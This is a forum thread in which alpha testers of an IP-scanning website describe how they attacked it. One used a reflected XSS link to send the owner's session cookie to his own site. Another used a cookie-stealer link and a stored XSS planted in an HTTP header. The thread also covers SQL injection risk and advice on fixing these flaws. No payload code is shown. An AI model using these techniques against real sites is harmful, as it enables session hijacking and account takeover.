Alpha testers wanted

[Goatboy]

Wow that's nice work! Please let me understand, you could get the admin access while my cookie was valid or whenever you want? Thanks again, it is good to know that it is vulnerable

Only when your cookie (session) was valid, which I believe is 24 minutes after you log out, by default. Basically the link I sent you to caused a redirect to my site along with your cookie in the URL, which I then logged. My script then sent you back to your main page, making it look like a simple redirect bug in your site. The XSS was reflected back on the search page because your site echoes back whatever I search for, largely unfiltered. You did a good job escaping quotes, but because of browsers' tendencies to ignore bad markup, I was able to load an external script in a technically illegal way.

This is a good example of why defense-in-depth is a good idea. I would suggest filtering out any input that does not look like an IP address (there are tons of regex patterns for this), and HTML-encoding anything printed in the HTTP header results page. This second part is because even if the search error page is safe, the results may not be. I set up my page to deliver an XSS payload as its header, which I believe will be included in the results (and therefore the main page) when it is indexed.

[bombshop]

Well i guess it is not possible to execute xss through the search script anymore. Of course i will be happy to be proven wrong
As for the header info, that was what i had in mind since the beginning of coding. Even though i sanitized the input, it showed me that my sanitization was not enough. Well, will be fixed in 5 minutes or something

[centip3de]

You are very vulnerable to both XSS and social engineering. The link I gave you was a cookie stealer. I promise I have not done anything malicious with this, but you should really look into it. I also entered my IP into the database with a custom HTTP header containing what will turn into a stored XSS attack if I am correct. Ciao.

Like a boss.

[bombshop]

well, anybody wants to comment on the usage of the site?

[Goatboy]

I am pretty sure someone has done this before, but I couldn't easily find anything on Google. So the idea is solid, and if you can speed up the searches it might catch on in the long-run. I'd suggest switching your search function to start with the exact IP that is given and then scan the rest of the range. This gets the desired result faster. Security is another issue, not only because of the XSS I demonstrated. Someone could also put a malicious SQL query into their header which might be executed when scanned. I noticed that you escape characters for your search string, but not for HTTP headers.

[bombshop]

Actually i do escape the strings in the headers when recording. I also escape them while showing them. But i know it wouldn't hurt to check once more

-- Sat Mar 19, 2011 4:42 pm --

I am happy to announce that the crawling functionality is now somewhat automatized. It is not full automatic right now but this is also good